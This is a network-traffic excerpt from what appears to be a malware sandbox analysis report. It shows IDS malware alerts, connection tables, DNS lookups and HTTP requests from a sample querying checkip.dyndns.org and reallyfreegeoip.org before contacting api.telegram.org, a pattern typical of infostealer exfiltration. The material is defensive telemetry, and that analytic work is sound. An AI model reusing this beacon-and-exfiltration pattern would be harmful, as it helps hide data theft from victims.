                                                                                                        2024-11-18T13:25:57.276302+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649728188.114.97.3443TCP
                                                                                                        2024-11-18T13:25:59.122927+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649734158.101.44.24280TCP
                                                                                                        2024-11-18T13:26:02.985299+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649765188.114.97.3443TCP
                                                                                                        2024-11-18T13:26:05.822014+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649788188.114.97.3443TCP
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Nov 18, 2024 13:25:53.892115116 CET4971180192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:25:53.897115946 CET8049711158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:25:53.897228003 CET4971180192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:25:53.897425890 CET4971180192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:25:53.902319908 CET8049711158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:25:54.544030905 CET8049711158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:25:54.557102919 CET4971180192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:25:54.562144995 CET8049711158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:25:54.857108116 CET8049711158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:25:54.903954983 CET4971180192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:25:55.316420078 CET49722443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:55.316471100 CET44349722188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:55.316612959 CET49722443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:55.334377050 CET49722443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:55.334394932 CET44349722188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:55.958882093 CET44349722188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:55.959031105 CET49722443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:55.967993021 CET49722443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:55.968013048 CET44349722188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:55.969017029 CET44349722188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:56.013777018 CET49722443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:56.125607967 CET49722443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:56.171320915 CET44349722188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:56.262583971 CET44349722188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:56.262674093 CET44349722188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:56.262768984 CET49722443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:56.283260107 CET49722443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:56.290993929 CET4971180192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:25:56.295943022 CET8049711158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:25:56.492731094 CET8049711158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:25:56.496251106 CET49728443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:56.496298075 CET44349728188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:56.496362925 CET49728443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:56.496721983 CET49728443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:56.496735096 CET44349728188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:56.544640064 CET4971180192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:25:57.130690098 CET44349728188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:57.133111000 CET49728443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:57.133143902 CET44349728188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:57.276340008 CET44349728188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:57.276427984 CET44349728188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:57.276472092 CET49728443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:57.277152061 CET49728443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:57.296452999 CET4971180192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:25:57.297825098 CET4973480192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:25:57.302355051 CET8049711158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:25:57.302412987 CET4971180192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:25:57.303198099 CET8049734158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:25:57.303267956 CET4973480192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:25:57.303390026 CET4973480192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:25:57.308237076 CET8049734158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:25:59.070774078 CET8049734158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:25:59.072387934 CET49746443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:59.072437048 CET44349746188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:59.072500944 CET49746443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:59.072828054 CET49746443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:59.072843075 CET44349746188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:59.122926950 CET4973480192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:25:59.687797070 CET44349746188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:59.689677954 CET49746443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:59.689712048 CET44349746188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:59.829080105 CET44349746188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:59.829242945 CET44349746188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:25:59.829368114 CET49746443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:59.830033064 CET49746443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:25:59.838112116 CET4975280192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:25:59.843080044 CET8049752158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:25:59.843266964 CET4975280192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:25:59.843548059 CET4975280192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:25:59.848371029 CET8049752158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:00.524892092 CET8049752158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:00.526818037 CET49753443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:00.526890993 CET44349753188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:00.526985884 CET49753443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:00.527333975 CET49753443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:00.527367115 CET44349753188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:00.575862885 CET4975280192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:01.144467115 CET44349753188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:01.146743059 CET49753443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:01.146822929 CET44349753188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:01.289658070 CET44349753188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:01.289817095 CET44349753188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:01.289875984 CET49753443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:01.290571928 CET49753443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:01.298300982 CET4975280192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:01.299375057 CET4975980192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:01.303689003 CET8049752158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:01.303744078 CET4975280192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:01.304717064 CET8049759158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:01.304792881 CET4975980192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:01.304986954 CET4975980192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:01.310774088 CET8049759158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:02.200850964 CET8049759158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:02.202934980 CET49765443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:02.202982903 CET44349765188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:02.203049898 CET49765443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:02.203331947 CET49765443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:02.203351974 CET44349765188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:02.247792006 CET4975980192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:02.824174881 CET44349765188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:02.841404915 CET49765443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:02.841433048 CET44349765188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:02.985397100 CET44349765188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:02.985563040 CET44349765188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:02.985697031 CET49765443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:02.986479044 CET49765443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:02.990761995 CET4975980192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:02.991461039 CET4977180192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:02.996260881 CET8049759158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:02.996367931 CET4975980192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:02.997169971 CET8049771158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:02.997250080 CET4977180192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:02.997497082 CET4977180192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:03.002623081 CET8049771158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:03.640324116 CET8049771158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:03.642252922 CET49777443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:03.642302990 CET44349777188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:03.642405033 CET49777443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:03.642744064 CET49777443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:03.642757893 CET44349777188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:03.685237885 CET4977180192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:04.250907898 CET44349777188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:04.253324032 CET49777443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:04.253334999 CET44349777188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:04.388541937 CET44349777188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:04.388621092 CET44349777188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:04.388686895 CET49777443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:04.389229059 CET49777443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:04.392967939 CET4977180192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:04.394207954 CET4978380192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:04.398683071 CET8049771158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:04.398751974 CET4977180192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:04.399342060 CET8049783158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:04.399405956 CET4978380192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:04.399492025 CET4978380192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:04.404536963 CET8049783158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:05.042130947 CET8049783158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:05.043529034 CET49788443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:05.043565989 CET44349788188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:05.043632984 CET49788443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:05.043936014 CET49788443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:05.043942928 CET44349788188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:05.091434002 CET4978380192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:05.655009031 CET44349788188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:05.683075905 CET49788443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:05.683111906 CET44349788188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:05.822150946 CET44349788188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:05.822313070 CET44349788188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:05.822375059 CET49788443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:05.822772026 CET49788443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:05.828594923 CET4978380192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:05.829754114 CET4979080192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:05.834176064 CET8049783158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:05.834233999 CET4978380192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:05.834784031 CET8049790158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:05.834970951 CET4979080192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:05.835074902 CET4979080192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:05.840390921 CET8049790158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:06.474185944 CET8049790158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:06.476128101 CET49796443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:06.476191044 CET44349796188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:06.476277113 CET49796443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:06.476583004 CET49796443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:06.476608038 CET44349796188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:06.528966904 CET4979080192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:07.084083080 CET44349796188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:07.086488962 CET49796443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:07.086513996 CET44349796188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:07.233037949 CET44349796188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:07.233148098 CET44349796188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:07.233226061 CET49796443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:07.235956907 CET49796443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:07.242228985 CET4979080192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:07.244292021 CET4980280192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:07.247767925 CET8049790158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:07.247880936 CET4979080192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:07.249217987 CET8049802158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:07.249301910 CET4980280192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:07.249432087 CET4980280192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:07.254786968 CET8049802158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:07.891217947 CET8049802158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:07.894690037 CET49809443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:07.894761086 CET44349809188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:07.894934893 CET49809443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:07.895204067 CET49809443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:07.895231962 CET44349809188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:07.935328007 CET4980280192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:08.495002985 CET44349809188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:08.544599056 CET49809443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:08.546180964 CET49809443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:08.546199083 CET44349809188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:08.689976931 CET44349809188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:08.690056086 CET44349809188.114.97.3192.168.2.6
                                                                                                        Nov 18, 2024 13:26:08.690109968 CET49809443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:08.690640926 CET49809443192.168.2.6188.114.97.3
                                                                                                        Nov 18, 2024 13:26:08.767760992 CET4980280192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:08.773169994 CET8049802158.101.44.242192.168.2.6
                                                                                                        Nov 18, 2024 13:26:08.773233891 CET4980280192.168.2.6158.101.44.242
                                                                                                        Nov 18, 2024 13:26:08.776504040 CET49814443192.168.2.6149.154.167.220
                                                                                                        Nov 18, 2024 13:26:08.776556015 CET44349814149.154.167.220192.168.2.6
                                                                                                        Nov 18, 2024 13:26:08.776631117 CET49814443192.168.2.6149.154.167.220
                                                                                                        Nov 18, 2024 13:26:08.777297020 CET49814443192.168.2.6149.154.167.220
                                                                                                        Nov 18, 2024 13:26:08.777313948 CET44349814149.154.167.220192.168.2.6
                                                                                                        Nov 18, 2024 13:26:09.606590033 CET44349814149.154.167.220192.168.2.6
                                                                                                        Nov 18, 2024 13:26:09.606676102 CET49814443192.168.2.6149.154.167.220
                                                                                                        Nov 18, 2024 13:26:09.608963013 CET49814443192.168.2.6149.154.167.220
                                                                                                        Nov 18, 2024 13:26:09.608987093 CET44349814149.154.167.220192.168.2.6
                                                                                                        Nov 18, 2024 13:26:09.609329939 CET44349814149.154.167.220192.168.2.6
                                                                                                        Nov 18, 2024 13:26:09.610903978 CET49814443192.168.2.6149.154.167.220
                                                                                                        Nov 18, 2024 13:26:09.655334949 CET44349814149.154.167.220192.168.2.6
                                                                                                        Nov 18, 2024 13:26:09.843940020 CET44349814149.154.167.220192.168.2.6
                                                                                                        Nov 18, 2024 13:26:09.844028950 CET44349814149.154.167.220192.168.2.6
                                                                                                        Nov 18, 2024 13:26:09.844480038 CET49814443192.168.2.6149.154.167.220
                                                                                                        Nov 18, 2024 13:26:09.848479033 CET49814443192.168.2.6149.154.167.220
                                                                                                        Nov 18, 2024 13:26:17.051075935 CET4973480192.168.2.6158.101.44.242
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Nov 18, 2024 13:25:53.879149914 CET6021353192.168.2.61.1.1.1
                                                                                                        Nov 18, 2024 13:25:53.886903048 CET53602131.1.1.1192.168.2.6
                                                                                                        Nov 18, 2024 13:25:55.306848049 CET6114153192.168.2.61.1.1.1
                                                                                                        Nov 18, 2024 13:25:55.315156937 CET53611411.1.1.1192.168.2.6
                                                                                                        Nov 18, 2024 13:26:08.768594027 CET5317553192.168.2.61.1.1.1
                                                                                                        Nov 18, 2024 13:26:08.775584936 CET53531751.1.1.1192.168.2.6
                                                                                                        Nov 18, 2024 13:26:10.192169905 CET53634081.1.1.1192.168.2.6
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Nov 18, 2024 13:25:53.879149914 CET192.168.2.61.1.1.10xd83fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                        Nov 18, 2024 13:25:55.306848049 CET192.168.2.61.1.1.10x4841Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                        Nov 18, 2024 13:26:08.768594027 CET192.168.2.61.1.1.10x982dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Nov 18, 2024 13:25:53.886903048 CET1.1.1.1192.168.2.60xd83fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Nov 18, 2024 13:25:53.886903048 CET1.1.1.1192.168.2.60xd83fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                        Nov 18, 2024 13:25:53.886903048 CET1.1.1.1192.168.2.60xd83fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                        Nov 18, 2024 13:25:53.886903048 CET1.1.1.1192.168.2.60xd83fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                        Nov 18, 2024 13:25:53.886903048 CET1.1.1.1192.168.2.60xd83fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                        Nov 18, 2024 13:25:53.886903048 CET1.1.1.1192.168.2.60xd83fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                        Nov 18, 2024 13:25:55.315156937 CET1.1.1.1192.168.2.60x4841No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                        Nov 18, 2024 13:25:55.315156937 CET1.1.1.1192.168.2.60x4841No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                        Nov 18, 2024 13:26:08.775584936 CET1.1.1.1192.168.2.60x982dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                        • reallyfreegeoip.org
                                                                                                        • api.telegram.org
                                                                                                        • checkip.dyndns.org
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.649711158.101.44.242806256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 18, 2024 13:25:53.897425890 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Nov 18, 2024 13:25:54.544030905 CET323INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:25:54 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 106
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        X-Request-ID: 30fd322a32c26bb3b9f5ee922c8e24c1
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                                                                                        Nov 18, 2024 13:25:54.557102919 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Nov 18, 2024 13:25:54.857108116 CET323INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:25:54 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 106
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        X-Request-ID: 8931b723b81742392c38470cdfbb4eb7
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                                                                                        Nov 18, 2024 13:25:56.290993929 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Nov 18, 2024 13:25:56.492731094 CET323INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:25:56 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 106
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        X-Request-ID: c0ea6e83d0985fa4004d197cd3f5118a
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.649734158.101.44.242806256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 18, 2024 13:25:57.303390026 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Nov 18, 2024 13:25:59.070774078 CET323INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:25:58 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 106
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        X-Request-ID: ab827c03a0a08b069ff4eec17197b917
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.649752158.101.44.242806256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 18, 2024 13:25:59.843548059 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
